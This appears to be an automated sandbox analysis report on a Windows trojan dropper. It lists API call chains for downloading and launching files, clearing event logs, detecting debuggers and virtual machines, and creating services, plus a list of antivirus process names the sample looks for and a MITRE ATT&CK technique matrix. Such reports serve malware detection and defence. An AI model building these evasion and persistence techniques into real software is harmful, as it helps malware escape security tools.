                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: devenum.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: msdmo.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic file information: File size 4907008 > 1048576
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x258200
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x163c00
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic PE information: More than 200 imports for USER32.dll
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_0090F320 LoadLibraryW,GetProcAddress,_getMemBlockDataString,lstrlenA,failwithmessage,failwithmessage,0_2_0090F320
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeStatic PE information: real checksum: 0x4b2992 should be: 0x4aed10
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_1000C135 push ecx; ret 0_2_1000C148
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10004470 fuckyou,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,GetVersionExA,GetVersionExA,GetVersionExA,LoadLibraryW,GetProcAddress,FreeLibrary,WaitForSingleObject,CloseHandle,Sleep,Sleep,StartServiceCtrlDispatcherA,StartServiceCtrlDispatcherA,Sleep,StartServiceCtrlDispatcherA,ExpandEnvironmentStringsA,wsprintfA,GetModuleFileNameA,CopyFileA,Sleep,WaitForSingleObject,CloseHandle,ExitProcess,_memset,SHGetSpecialFolderPathA,_memset,_sprintf,GetFileAttributesA,GetModuleFileNameA,_sprintf,DefineDosDeviceA,Sleep,CopyFileA,SetFileAttributesA,_sprintf,ShellExecuteA,ExitProcess,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,_memset,_sprintf,lstrlenA,WaitForSingleObject,CloseHandle,Sleep,0_2_10004470
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Rsymwe miusskwqJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10004470 fuckyou,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,GetVersionExA,GetVersionExA,GetVersionExA,LoadLibraryW,GetProcAddress,FreeLibrary,WaitForSingleObject,CloseHandle,Sleep,Sleep,StartServiceCtrlDispatcherA,StartServiceCtrlDispatcherA,Sleep,StartServiceCtrlDispatcherA,ExpandEnvironmentStringsA,wsprintfA,GetModuleFileNameA,CopyFileA,Sleep,WaitForSingleObject,CloseHandle,ExitProcess,_memset,SHGetSpecialFolderPathA,_memset,_sprintf,GetFileAttributesA,GetModuleFileNameA,_sprintf,DefineDosDeviceA,Sleep,CopyFileA,SetFileAttributesA,_sprintf,ShellExecuteA,ExitProcess,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,_memset,_sprintf,lstrlenA,WaitForSingleObject,CloseHandle,Sleep,0_2_10004470

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 9652
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_00705B80 IsWindow,IsIconic,0_2_00705B80
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10005570 OpenEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,0_2_10005570
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10002190 SetupDiGetClassDevsA,SetupDiEnumDeviceInfo,GetLastError,SetupDiGetDeviceRegistryPropertyA,_memset,SetupDiGetDeviceRegistryPropertyA,GetLastError,GetLastError,GetLastError,LocalFree,SetupDiGetDeviceRegistryPropertyA,GetLastError,SetupDiSetClassInstallParamsA,GetLastError,SetupDiCallClassInstaller,GetLastError,SetupDiEnumDeviceInfo,GetLastError,SetupDiDestroyDeviceInfoList,SetLastError,0_2_10002190
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-44135
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe TID: 1988Thread sleep count: 344 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe TID: 1988Thread sleep time: -172000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10001ED0 _memset,SHGetSpecialFolderPathA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,_memmove,FindNextFileA,FindNextFileA,0_2_10001ED0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10003160 _memset,lstrcpyA,lstrcpyA,lstrlenA,lstrlenA,lstrcpyA,lstrlenA,lstrcpyA,lstrlenA,gethostname,lstrlenA,getsockname,GetVersionExA,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyA,RegQueryValueExA,RegCloseKey,GetSystemInfo,wsprintfA,wsprintfA,wsprintfA,GlobalMemoryStatusEx,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,_memset,GetLastInputInfo,GetTickCount,lstrlenA,lstrlenA,lstrcpyA,lstrlenA,lstrcpyA,0_2_10003160
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459663986.00000000011E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459663986.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459663986.0000000001214000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459663986.00000000011B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdWndClassY
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeAPI call chain: ExitProcess graph end nodegraph_0-44058
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeAPI call chain: ExitProcess graph end nodegraph_0-43795
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_008DEEA0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_008DEEA0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_0090F320 LoadLibraryW,GetProcAddress,_getMemBlockDataString,lstrlenA,failwithmessage,failwithmessage,0_2_0090F320
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_006D15D0 SetLastError,SetLastError,VirtualAlloc,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,VirtualFree,VirtualAlloc,_memmove,SetLastError,0_2_006D15D0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_008DEEA0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_008DEEA0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_008ECF00 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008ECF00
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_1000B110 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_1000B110
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_1000BD36 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_1000BD36
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10002190 SetupDiGetClassDevsA,SetupDiEnumDeviceInfo,GetLastError,SetupDiGetDeviceRegistryPropertyA,_memset,SetupDiGetDeviceRegistryPropertyA,GetLastError,GetLastError,GetLastError,LocalFree,SetupDiGetDeviceRegistryPropertyA,GetLastError,SetupDiSetClassInstallParamsA,GetLastError,SetupDiCallClassInstaller,GetLastError,SetupDiEnumDeviceInfo,GetLastError,SetupDiDestroyDeviceInfoList,SetLastError,0_2_10002190
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_0090E750 GetSystemTimeAsFileTime,__aulldiv,0_2_0090E750
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_00908100 __get_timezone,__invoke_watson_if_error,__get_daylight,__invoke_watson_if_error,__get_dstbias,__invoke_watson_if_error,____lc_codepage_func,__getenv_helper_nolock,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_strlen,_strlen,_wcscpy_s,__invoke_watson_if_error,_strncpy_s,__invoke_watson_if_error,_strncpy_s,__invoke_watson_if_error,0_2_00908100
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exeCode function: 0_2_10003160 _memset,lstrcpyA,lstrcpyA,lstrlenA,lstrlenA,lstrcpyA,lstrlenA,lstrcpyA,lstrlenA,gethostname,lstrlenA,getsockname,GetVersionExA,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyA,RegQueryValueExA,RegCloseKey,GetSystemInfo,wsprintfA,wsprintfA,wsprintfA,GlobalMemoryStatusEx,GetDriveTypeA,GetDriveTypeA,GetDiskFreeSpaceExA,LoadLibraryA,GetProcAddress,GetProcAddress,FreeLibrary,_memset,GetLastInputInfo,GetTickCount,lstrlenA,lstrlenA,lstrcpyA,lstrlenA,lstrcpyA,0_2_10003160
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: cpf.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: F-PROT.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: spidernt.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: F-PROT.EXE
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: nspupsvc.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: SBAMSvc.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: a2guard.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsmon.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: Mcshield.exe
                      Source: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe, 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.99228c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.6d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe PID: 5680, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.99228c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.6d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe PID: 5680, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.99228c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.6d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe PID: 5680, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.99228c.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.10000000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe.6d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3460334627.0000000010015000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3459358578.0000000000992000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Trojan.MulDrop28.21322.11416.10977.exe PID: 5680, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire Infrastructure1
                      Valid Accounts
                      1
                      Native API
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      1
                      Deobfuscate/Decode Files or Information
                      121
                      Input Capture
                      2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      12
                      Ingress Tool Transfer
                      Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomains1
                      Replication Through Removable Media
                      2
                      Command and Scripting Interpreter
                      1
                      Valid Accounts
                      1
                      Valid Accounts
                      2
                      Obfuscated Files or Information
                      LSASS Memory11
                      Peripheral Device Discovery
                      Remote Desktop Protocol121
                      Input Capture
                      1
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts12
                      Service Execution
                      23
                      Windows Service
                      11
                      Access Token Manipulation
                      1
                      DLL Side-Loading
                      Security Account Manager1
                      File and Directory Discovery
                      SMB/Windows Admin Shares3
                      Clipboard Data
                      11
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook23
                      Windows Service
                      1
                      Valid Accounts
                      NTDS16
                      System Information Discovery
                      Distributed Component Object ModelInput Capture1
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Virtualization/Sandbox Evasion
                      LSA Secrets1
                      Query Registry
                      SSHKeylogging111
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                      Access Token Manipulation
                      Cached Domain Credentials31
                      Security Software Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Indicator Removal
                      DCSync1
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
